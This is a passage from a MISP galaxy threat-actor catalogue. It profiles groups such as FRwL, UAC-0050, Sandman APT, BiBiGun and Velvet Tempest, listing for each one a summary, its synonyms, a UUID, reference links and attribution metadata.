From Russia with Love, is a threat actor group that emerged during the Russia-Ukraine war in 2022. They primarily engage in DDoS attacks and have targeted critical infrastructure, media, energy, and government entities. FRwL has been linked to the use of the Somnia ransomware, which they employ as a wiper rather than for financial gain. While there is no direct evidence linking FRwL to the Russian Main Intelligence Directorate, it is possible that they coordinate activities with state-aligned hacktivist groups.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UAC-0118.
Known Synonyms |
---|
FRwL |
FromRussiaWithLove |
Internal MISP references
UUID d869486a-ec70-4a74-897e-31aa7b3df48d
which can be used as unique global reference for UAC-0118
in MISP communities and other software using the MISP galaxy
External references
- https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/ - webarchive
- https://spixnet.at/cybersecurity-blog/2022/11/15/russian-hacktivists-hit-ukrainian-orgs-with-ransomware-but-no-ransom-demands/ - webarchive
- https://outpost24.com/blog/ics-attack-classifications/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
UAC-0050
UAC-0050 is a threat actor that has been active since 2020, targeting government agencies in Ukraine. They have been distributing the Remcos RAT malware through phishing campaigns, using tactics such as impersonating the Security Service of Ukraine and sending emails with malicious attachments. The group has also been linked to other hacking collectives, such as UAC-0096, and has previously used remote administration tools like Remote Utilities. The motive behind their attacks is likely espionage.
Internal MISP references
UUID e3ff56b6-2663-46bd-9e5c-017a350896d9
which can be used as unique global reference for UAC-0050
in MISP communities and other software using the MISP galaxy
External references
- https://cert.gov.ua/article/3931296 - webarchive
- https://socprime.com/blog/remcos-rat-detection-uac-0050-hackers-launch-phishing-attacks-impersonating-the-security-service-of-ukraine/ - webarchive
- https://socprime.com/blog/new-phishing-attack-detection-attributed-to-the-uac-0050-and-uac-0096-groups-spreading-remcos-spyware/ - webarchive
- https://cert.gov.ua/article/3804703 - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
UNC2630
UNC2630 is a threat actor believed to be affiliated with the Chinese government. They engage in cyber espionage activities, targeting organizations aligned with Beijing's strategic objectives. UNC2630 demonstrates advanced tradecraft and employs various malware families, including SLOWPULSE and RADIALPULSE, to compromise Pulse Secure VPN appliances. They also utilize modified binaries and scripts to maintain persistence and move laterally within compromised networks.
Internal MISP references
UUID 86dfe64e-7101-4d45-bb94-efc40c5e14fe
which can be used as unique global reference for UNC2630
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Sandman APT
First disclosed in 2023, the Sandman APT is likely associated with suspected China-based threat clusters known for using the KEYPLUG backdoor, specifically STORM-0866/Red Dev 40. Sandman is tracked as a distinct cluster, pending additional conclusive information. A notable characteristic is its use of the LuaDream backdoor. LuaDream is based on the Lua platform, a relatively rare occurrence in the cyberespionage domain, historically associated with APTs considered Western or Western-aligned.
Internal MISP references
UUID 00b84012-fa25-4942-ad64-c76be24828a8
which can be used as unique global reference for Sandman APT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['Middle East', 'Southeast Asian', 'France', 'Egypt', 'Sudan', 'South Sudan', 'Libya', 'Turkey', 'Saudi Arabia', 'Oman', 'Yemen', 'Sri Lanka', 'India', 'Pakistan', 'Iran', 'Afghanistan', 'Kuwait', 'Iraq', 'United Arab Emirates'] |
cfr-target-category | ['Government', 'Telecommunications'] |
cfr-type-of-incident | Espionage |
country | CN |
references | ['https://www.sentinelone.com/labs/sandman-apt-china-based-adversaries-embrace-lua/', 'https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/'] |
BiBiGun
A pro-Hamas hacktivist group developed a wiper called BiBi-Linux to target and destroy data on Israeli systems. The malware impersonates ransomware but operates solely to corrupt and delete files, indicating no data theft. A Windows variant, BiBi-Windows, was also discovered, sharing similarities with BiBi-Linux but targeting all files except executables. ESET researchers have named the group behind the wipers BiBiGun. The group's TTPs have shown overlaps with Moses Staff, which is believed to have an Iran nexus.
Internal MISP references
UUID f8054f5b-45e5-4624-b8d0-1b9c30aa084e
which can be used as unique global reference for BiBiGun
in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/ESETresearch/status/1719437301900595444 - webarchive
- https://github.com/knight0x07/BiBi-Windows-Wiper-Analysis?tab=readme-ov-file - webarchive
- https://thehackernews.com/2023/11/new-bibi-windows-wiper-targets-windows.html - webarchive
- https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | PS |
Storm-1283
Storm-1283 is a threat actor that targeted Microsoft Azure cloud platform. They gained access to user accounts and created OAuth applications using stolen credentials, allowing them to control resources and deploy virtual machines for cryptomining. The targeted organizations incurred significant financial losses ranging from $10,000 to $1.5 million. Storm-1283 utilized compromised accounts and subscriptions to carry out their illicit activities.
Internal MISP references
UUID c9ffcc82-f7ac-46ce-9ea2-91e51d14e11b
which can be used as unique global reference for Storm-1283
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Solntsepek
Solntsepek is a threat actor group with ties to the Russian military unit GRU. They have claimed responsibility for a cyberattack on Kyivstar, a Ukrainian mobile operator, and have been linked to previous attacks on Ukrainian infrastructure. Solntsepek has been associated with the Sandworm hacking group, known for their destructive cyberattacks, including the NotPetya worm. They have also engaged in hostile activities, such as revealing personal details of Ukrainian soldiers.
Internal MISP references
UUID 0b792fbe-87c2-42c5-8d0d-97c7d47078b5
which can be used as unique global reference for Solntsepek
in MISP communities and other software using the MISP galaxy
External references
- https://kyivindependent.com/sbu-russian-hacker-group-reponsible-for-kyiv-star-cyberattack/ - webarchive
- https://dev.ua/ru/news/atakovali-suspilne-provaiderov-i-minrazvitiya-obschin-kto-stoit-za-rossiiskoi-gruppirovkoi-solntsepek-kotoraya-aktivizirovala-napadeniya-na-ukrainskie-struktury - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UNC4736
UNC4736 is a North Korean threat actor that has been involved in supply chain attacks targeting software chains of 3CX and X_TRADER. They have used malware strains such as TAXHAUL, Coldcat, and VEILEDSIGNAL to compromise Windows and macOS systems. UNC4736 has been linked to financially motivated cybercrime operations, particularly focused on cryptocurrency and fintech-related services. They have also demonstrated infrastructure overlap with other North Korean and APT43 activity.
Internal MISP references
UUID afe5526e-e5e4-4b05-bc69-2bfb6785fc7e
which can be used as unique global reference for UNC4736
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
GambleForce
GambleForce is a threat actor specializing in SQL injection attacks. They have targeted over 20 websites in various sectors across multiple countries, compromising six companies. GambleForce utilizes publicly available pentesting tools and has been active since mid-September 2023.
Internal MISP references
UUID 94ce7925-1a37-4b02-a25b-b87a389c92b3
which can be used as unique global reference for GambleForce
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GREF
GREF is a China-aligned APT group that has been active since at least March 2017. They are known for using custom backdoors, loaders, and ancillary tools in their targeted attacks. Recently, they have been attributed to two active Android campaigns that distribute the BadBazaar malware through malicious apps on official and alternative app stores. GREF has targeted Android users, particularly Uyghurs and other Turkic ethnic minorities outside of China, using trojanized versions of popular messaging apps like Signal and Telegram.
Internal MISP references
UUID e6d16c22-0780-483c-9920-c1d9f27b10c8
which can be used as unique global reference for GREF
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
PhantomControl
PhantomControl is a sophisticated threat actor that emerged in November 2023. They utilize phishing emails as their initial infection vector and employ a ScreenConnect client to establish a connection for their malicious activities. Their arsenal includes a VBS script that hides its true intentions and reveals a complex mechanism involving PowerShell scripts and image-based data retrieval. PhantomControl has been associated with the Blind Eagle threat actors, showcasing their versatility and reach.
Internal MISP references
UUID a2208d56-8f08-4ca3-a304-8bdc334b5ebf
which can be used as unique global reference for PhantomControl
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Team-Xecuter
Team-Xecuter is a hacking group led by Gary Bowser, also known as GaryOPA. They were involved in a piracy conspiracy against Nintendo, creating and selling illegal circumvention devices that allowed users to hack video game consoles for playing pirated games. Gary Bowser has admitted his participation in this activity and is facing legal consequences.
Internal MISP references
UUID ef9f4e6d-4262-4fca-9535-56af9e46281f
which can be used as unique global reference for Team-Xecuter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
KelvinSecurity
KelvinSecurity is a hacker group that has been active since at least 2015. They are known for their hacktivist and black hat activities, targeting public and private organizations globally. The group sells and leaks databases, documents, and access belonging to their victims, often on the dark web or their own platforms. They have been involved in attacks against various sectors, including telecommunications, political parties, and healthcare.
Internal MISP references
UUID 7b8845d9-d7f5-4895-9dcc-54da3492bd55
which can be used as unique global reference for KelvinSecurity
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/kaspersky-security-bulletin-apt-predictions-2024/111048/ - webarchive
- https://www.privacyaffairs.com/kelvinsecurity-hacking-group-morena/ - webarchive
- https://www.databreaches.net/bits-n-pieces-trozos-y-piezas-31/ - webarchive
- https://www.ibtimes.com/anonymous-challenges-russias-supposed-cyber-prowess-repeat-rosatom-breach-leaks-data-3505131 - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | ES |
Storm-1113
Storm-1113 is a threat actor that acts both as an access broker focused on malware distribution through search advertisements and as an “as-a-service” entity providing malicious installers and landing page frameworks. In Storm-1113 malware distribution campaigns, users are directed to landing pages mimicking well-known software that host installers, often MSI files, that lead to the installation of malicious payloads. Storm-1113 is also the developer of EugenLoader, a commodity malware first observed around November 2022.
Internal MISP references
UUID 993e81e8-63f4-4666-9538-4053a69287ba
which can be used as unique global reference for Storm-1113
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HomeLand Justice
HomeLand Justice is an Iranian state-sponsored cyber threat group that has been active since at least May 2021. They have targeted various organizations, including a well-known telecommunication company and the Albanian Parliament. The group engaged in information operations and messaging campaigns to amplify the impact of their attacks.
Internal MISP references
UUID bfc538e1-9205-420a-8641-6292023ecd08
which can be used as unique global reference for HomeLand Justice
in MISP communities and other software using the MISP galaxy
External references
- https://www.picussecurity.com/resource/blog/cisa-alert-aa22-264a-iranian-homeland-justice-apt-groups-ttp - webarchive
- https://www.attackiq.com/2022/09/23/attack-graph-response-to-us-cert-alert-aa22-264a-iranian-state-actors-conduct-cyber-operations-against-the-government-of-albania/ - webarchive
- https://www.mandiant.com/resources/blog/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
UAC-0099
UAC-0099 is a threat actor that has been active since at least May 2023, targeting Ukrainian entities. They have been observed using a known WinRAR vulnerability to carry out attacks, indicating a level of sophistication. The actor relies on PowerShell and the creation of scheduled tasks to execute malicious VBS files for initial infection. Monitoring and limiting the functionality of these components can help mitigate the risk of UAC-0099 attacks.
Internal MISP references
UUID 267488cb-159a-46d6-a6d6-fe93c90360b2
which can be used as unique global reference for UAC-0099
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gray Sandstorm
Gray Sandstorm is an Iran-linked threat actor that has been active since at least 2012. They have targeted defense technology companies, maritime transportation companies, and Persian Gulf ports of entry. Their primary method of attack is password spraying, and they have been observed using tools like o365spray. They have a specific focus on US and Israeli targets and are likely operating in support of Iranian interests.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gray Sandstorm.
Known Synonyms |
---|
DEV-0343 |
Internal MISP references
UUID 6ea73b7f-b2e5-4e6d-a1ff-705f91175613
which can be used as unique global reference for Gray Sandstorm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Threatsec
ThreatSec is a hacktivist group that has targeted various organizations, including internet service providers in Gaza. They claim to fight for the rights and freedom of the oppressed and do not prioritize monetary gain. The group is part of the "Five Families" consortium, which includes other hacktivist groups such as GhostSec and Stormous. ThreatSec has been involved in cyberattacks, data breaches, and ransomware activities.
Internal MISP references
UUID 179deaab-12d2-4371-b499-51b925546a22
which can be used as unique global reference for Threatsec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Toufan
Cyber Toufan is a threat actor group that has gained prominence for its cyberattacks targeting Israeli organizations. The group's tactics suggest potential nation-state backing, possibly from Iran. They have been involved in hack-and-leak operations, data breaches, and data destruction, impacting over 100 organizations. Cyber Toufan's activities align with geopolitical tensions in the Middle East and their attacks are characterized by a combination of technical breaches and psychological warfare.
Internal MISP references
UUID 3decddc7-e554-48d8-8304-38b243fc9ccb
which can be used as unique global reference for Cyber Toufan
in MISP communities and other software using the MISP galaxy
External references
- https://www.darkreading.com/cyberattacks-data-breaches/-cyber-toufan-hacktivists-leaked-100-plus-israeli-orgs-in-one-month - webarchive
- https://socradar.io/dark-web-profile-cyber-toufan-al-aqsa/ - webarchive
- https://research.checkpoint.com/2023/11th-december-threat-intelligence-report/ - webarchive
- https://blog.polyswarm.io/2023-recap-cyber-activity-in-the-gaza-conflict - webarchive
- https://www.securityweek.com/palestinian-hackers-hit-100-israeli-organizations-in-destructive-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Water Curupira
With its emergence in 2022, Water Curupira has established itself as a persistent threat actor targeting organizations primarily in South America and Europe. Their modus operandi involves a combination of social engineering tactics and a diversified malware arsenal, including ransomware variants like Black Basta and credential stealers like Cobalt Strike. This multifaceted approach enables them to gain unauthorized access to victim systems, steal sensitive data, and ultimately extort victims through ransomware demands. It has been actively using Pikabot, a loader malware with similarities to Qakbot, in spam campaigns throughout 2023.
Internal MISP references
UUID a36266ce-2374-472a-a715-13b99e38e74e
which can be used as unique global reference for Water Curupira
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UTA0178
While Volexity largely observed the attacker essentially living off the land, they still deployed a handful of malware files and tools during the course of the incident which primarily consisted of webshells, proxy utilities, and file modifications to allow credential harvesting. Once UTA0178 had access into the network via the ICS VPN appliance, their general approach was to pivot from system to system using compromised credentials. They would then further compromise credentials of users on any new system that was breached, and use these credentials to log into additional systems via RDP. Volexity observed the attacker obtaining credentials in a variety of ways.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UTA0178.
Known Synonyms |
---|
Red Dev 61 |
UNC5221 |
Internal MISP references
UUID f288f686-b5b3-4c86-9960-5f8fb18709a3
which can be used as unique global reference for UTA0178
in MISP communities and other software using the MISP galaxy
External references
- https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-advisory-ivanti-vpn-zero-days-weaponized-by-unc5221-threat-actors-to-deploy-multiple-malware-families-active-iocs/ - webarchive
- https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day - webarchive
- https://quointelligence.eu/2024/01/unc5221-unreported-and-undetected-wirefire-web-shell-variant/ - webarchive
- https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/ - webarchive
- https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | CN |
Related clusters
To see the related clusters, click here.
TAG-28
TAG-28 is a Chinese state-sponsored threat actor that has been targeting Indian organizations, including media conglomerates and government agencies. They have been using the Winnti malware, which is commonly shared among Chinese state-sponsored groups. TAG-28's main objective is to gather intelligence on Indian targets, potentially for espionage purposes.
Internal MISP references
UUID 6c706d8b-95a4-428d-9de5-b68b29b1893c
which can be used as unique global reference for TAG-28
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Flax Typhoon
Flax Typhoon is a Chinese state-sponsored threat actor that primarily targets organizations in Taiwan. They conduct espionage campaigns and focus on gaining and maintaining long-term access to networks using minimal malware. Flax Typhoon relies on tools built into the operating system and legitimate software to remain undetected. They exploit vulnerabilities in public-facing servers, use living-off-the-land techniques, and deploy a VPN connection to maintain persistence and move laterally within compromised networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Flax Typhoon.
Known Synonyms |
---|
Ethereal Panda |
Storm-0919 |
Internal MISP references
UUID 50ee2b1b-979e-4507-8747-8597a95938f6
which can be used as unique global reference for Flax Typhoon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Cyber Partisans
The Cyber Partisans, a hacktivist group based in Belarus, has been involved in various cyber-attacks targeting organizations and infrastructure in Belarus and Ukraine. They have hacked and wiped the network of the Belarusian Telegraph Agency, targeted the Belarusian Red Cross, and conducted ransomware attacks on the Belarusian Railway and Belarusian State University. The group aims to expose alleged crimes committed by pro-government organizations and disrupt operations supporting the Russian military operation against Ukraine. They have also leaked stolen data to journalists and expressed support for Ukraine.
Internal MISP references
UUID a9f894c6-70ab-4174-b470-5999fe93d4f3
which can be used as unique global reference for Cyber Partisans
in MISP communities and other software using the MISP galaxy
External references
- https://blog.sekoia.io/the-transportation-sector-cyber-threat-overview/ - webarchive
- https://riskybiznews.substack.com/p/risky-biz-news-cyber-partisans-hack - webarchive
- https://therecord.media/cyber-partisans-belarusian-state-university-attack - webarchive
- https://therecord.media/pro-ukraine-hackers-leak-russian-data-in-hopes-someone-will-make-sense-of-it/ - webarchive
- https://therecord.media/this-app-will-self-destruct-how-belarusian-hackers-created-an-alternative-telegram-for-activists/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | BY |
Caliente Bandits
Caliente Bandits is a highly active threat group that targets multiple industries, including finance and entertainment. They distribute the Bandook remote access trojan using Spanish-language lures through low-volume email campaigns. The group primarily impacts individuals with Spanish surnames and conducts reconnaissance to obtain employee data. They masquerade as companies in South America and use Hotmail or Gmail email addresses.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Caliente Bandits.
Known Synonyms |
---|
TA2721 |
Internal MISP references
UUID 6a77a337-bfa0-416c-8c06-1d489d0d6838
which can be used as unique global reference for Caliente Bandits
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cotton Sandstorm
Cotton Sandstorm is an Iranian threat actor involved in hack-and-leak operations. They have targeted various organizations, including the French satirical magazine Charlie Hebdo, where they obtained and leaked personal information of over 200,000 customers. The group has been linked to the Iranian government and has been sanctioned by the US Treasury
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cotton Sandstorm.
Known Synonyms |
---|
Emennet Pasargad |
Holy Souls |
MARNANBRIDGE |
NEPTUNIUM |
Internal MISP references
UUID bbb389f2-344f-4ca8-a9c9-902061f88deb
which can be used as unique global reference for Cotton Sandstorm
in MISP communities and other software using the MISP galaxy
External references
- https://blog.sekoia.io/iran-cyber-threat-overview/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2023/02/03/dtac-charlie-hebdo-hack-iran-neptunium/ - webarchive
- https://www.ic3.gov/Media/News/2022/220126.pdf - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/threat-briefs/iran-response-for-charlie-hebdo-attacks/ - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['United States', 'Israel', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Finance', 'High-Tech', 'Telecoms', 'NGOs', 'Civil Society', 'Rail', 'Energy'] |
cfr-type-of-incident | Information Operations |
country | IR |
Blackwood
Blackwood is a China-aligned APT group that has been active since at least 2018. They primarily engage in cyberespionage operations targeting individuals and companies in China, Japan, and the United Kingdom. Blackwood utilizes sophisticated techniques such as adversary-in-the-middle attacks to deliver their custom implant, NSPX30, through updates of legitimate software. They also have the capability to hide the location of their command and control servers by intercepting traffic generated by the implant.
Internal MISP references
UUID 46e26e5c-ad74-45aa-a654-1afef67f4566
which can be used as unique global reference for Blackwood
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Denim Tsunami
Denim Tsunami is a threat actor group that has been involved in targeted attacks against European and Central American customers. They have been observed using multiple Windows and Adobe 0-day exploits, including one for CVE-2022-22047, which is a privilege escalation vulnerability. Denim Tsunami developed a custom malware called Subzero, which has capabilities such as keylogging, capturing screenshots, data exfiltration, and running remote shells. They have also been associated with the Austrian spyware distributor DSIRF.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Denim Tsunami.
Known Synonyms |
---|
DSIRF |
KNOTWEED |
Internal MISP references
UUID 79a347d9-1938-4550-8836-98e4ed95f77c
which can be used as unique global reference for Denim Tsunami
in MISP communities and other software using the MISP galaxy
External references
- https://www.thezdi.com/blog/2023/1/23/activation-context-cache-poisoning-exploiting-csrss-for-privilege-escalation - webarchive
- https://socradar.io/threats-of-commercialized-malware-knotweed/ - webarchive
- https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | AT |
Blue Tsunami
Blue Tsunami, also known as Black Cube, is a cyber mercenary group associated with the private intelligence firm Black Cube. They target individuals in various industries, including human rights, finance, and consulting. Blue Tsunami engages in social engineering and uses techniques such as honeypot profiles, fake jobs, and fake companies to gather human intelligence for their clients. LinkedIn and Microsoft recently took down numerous fake accounts and company pages linked to Blue Tsunami.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blue Tsunami.
Known Synonyms |
---|
Black Cube |
Internal MISP references
UUID 46104ded-49f5-4440-bd25-e05c1126f0ba
which can be used as unique global reference for Blue Tsunami
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
Cuboid Sandstorm
Cuboid Sandstorm is an Iranian threat actor that targeted an Israel-based IT company in July 2021. They gained access to the company's network and used it to compromise downstream customers in the defense, energy, and legal sectors in Israel. The group also utilized custom implants, including a remote access Trojan disguised as RuntimeBroker.exe or svchost.exe, to establish persistence on victim hosts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cuboid Sandstorm.
Known Synonyms |
---|
DEV-0228 |
Internal MISP references
UUID a4004712-f74b-4c8c-b1fb-bb7229bc2da1
which can be used as unique global reference for Cuboid Sandstorm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Pearl Sleet
Pearl Sleet is a nation state activity group based in North Korea that has been active since at least 2012. They primarily target defectors from North Korea, media organizations in carrying out their cyber espionage activities.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pearl Sleet.
Known Synonyms |
---|
DEV-0215 |
LAWRENCIUM |
Internal MISP references
UUID ef0d776a-51de-4965-ba1c-69ed256e0e5d
which can be used as unique global reference for Pearl Sleet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
Carmine Tsunami
Carmine Tsunami is a threat actor linked to an Israel-based private sector offensive actor called QuaDream. QuaDream sells a platform called REIGN to governments for law enforcement purposes, which includes exploits, malware, and infrastructure for data exfiltration from mobile devices. Carmine Tsunami is associated with the iOS malware called KingsPawn and has targeted civil society victims, including journalists, political opposition figures, and NGO workers, in various regions. They utilize domain registrars and inexpensive cloud hosting providers, often using single domains per IP address and deploying free Let's Encrypt SSL certificates.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Carmine Tsunami.
Known Synonyms |
---|
DEV-0196 |
QuaDream |
Internal MISP references
UUID fa76ce6a-f434-4d4a-817f-c4bd0a3f803c
which can be used as unique global reference for Carmine Tsunami
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
Mustard Tempest
Mustard Tempest is a threat actor that primarily uses malvertising as their main technique to gain access to and profile networks. They deploy FakeUpdates, disguised as browser updates or software packages, to lure targets into downloading a ZIP file containing a JavaScript file. Once executed, the JavaScript framework acts as a loader for other malware campaigns, often Cobalt Strike payloads. Mustard Tempest has been associated with the cybercrime syndicate Mustard Tempest, also known as EvilCorp, and has been involved in ransomware attacks using payloads such as WastedLocker, PhoenixLocker, and Macaw.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mustard Tempest.
Known Synonyms |
---|
DEV-0206 |
Purple Vallhund |
Internal MISP references
UUID 3ce9610b-2435-4c41-80d1-3f95a5ff2984
which can be used as unique global reference for Mustard Tempest
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC4990
UNC4990 is a financially motivated threat actor that has been active since at least 2020. They primarily target users in Italy and rely on USB devices for initial infection. The group has evolved their tactics over time, using encoded text files on popular websites like GitHub and Vimeo to host payloads. They have been observed using sophisticated backdoors like QUIETBOARD and EMPTYSPACE, and have targeted organizations in various industries, particularly in Italy.
Internal MISP references
UUID 7db46444-2d27-4922-8a21-98f8509476dc
which can be used as unique global reference for UNC4990
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IT |
Caramel Tsunami
Caramel Tsunami is a threat actor that specializes in spyware attacks. They have recently resurfaced with an updated toolset and zero-day exploits, targeting specific victims through watering hole attacks. Candiru has been observed exploiting vulnerabilities in popular browsers like Google Chrome and using third-party signed drivers to gain access to the Windows kernel. They have also been linked to other spyware vendors and have been associated with extensive abuses of their surveillance tools.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Caramel Tsunami.
Known Synonyms |
---|
Candiru |
SOURGUM |
Internal MISP references
UUID 062938a2-6fa1-4217-ad73-f5e0b5186966
which can be used as unique global reference for Caramel Tsunami
in MISP communities and other software using the MISP galaxy
External references
- https://decoded.avast.io/threatresearch/avast-q2-2022-threat-report/ - webarchive
- https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/ - webarchive
- https://citizenlab.ca/2022/04/catalangate-extensive-mercenary-spyware-operation-against-catalans-using-pegasus-candiru/ - webarchive
- https://citizenlab.ca/2021/12/pegasus-vs-predator-dissidents-doubly-infected-iphone-reveals-cytrox-mercenary-spyware/ - webarchive
- https://www.welivesecurity.com/2021/11/16/strategic-web-compromises-middle-east-pinch-candiru/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Storm-0867
Storm-0867 is a threat actor that has been active since 2012 and has targeted various industries and regions. They employ sophisticated phishing campaigns, utilizing social engineering techniques and a phishing as a service platform called Caffeine. Their attacks involve intercepting and manipulating communication between users and legitimate services, allowing them to steal passwords, hijack sign-in sessions, bypass multifactor authentication, and modify authentication methods.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-0867.
Known Synonyms |
---|
DEV-0867 |
Internal MISP references
UUID dc1d0202-8976-4d15-810d-4af0feff6af9
which can be used as unique global reference for Storm-0867
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | EG |
Velvet Tempest
Velvet Tempest is a threat actor associated with the BlackCat ransomware group. They have been observed deploying multiple ransomware payloads, including BlackCat, and have targeted various industries such as energy, fashion, tobacco, IT, and manufacturing. Velvet Tempest relies on access brokers to gain network access and utilizes tools like Cobalt Strike Beacons and PsExec for lateral movement and payload staging. They exfiltrate stolen data using a tool called StealBit and frequently disable unprotected antivirus products.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Velvet Tempest.
Known Synonyms |
---|
DEV-0504 |
Internal MISP references
UUID 209b1452-7062-46f8-9037-3be5f7eda54f
which can be used as unique global reference for Velvet Tempest
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Sunglow Blizzard
DEV-0665 is a threat actor associated with the HermeticWiper attacks. Their objective is to disrupt, degrade, and destroy specific resources within a targeted country.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sunglow Blizzard.
Known Synonyms |
---|
DEV-0665 |
Internal MISP references
UUID 9c0f0db1-b773-42ff-a6f7-d4b6c1d28ca4
which can be used as unique global reference for Sunglow Blizzard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Vanilla Tempest
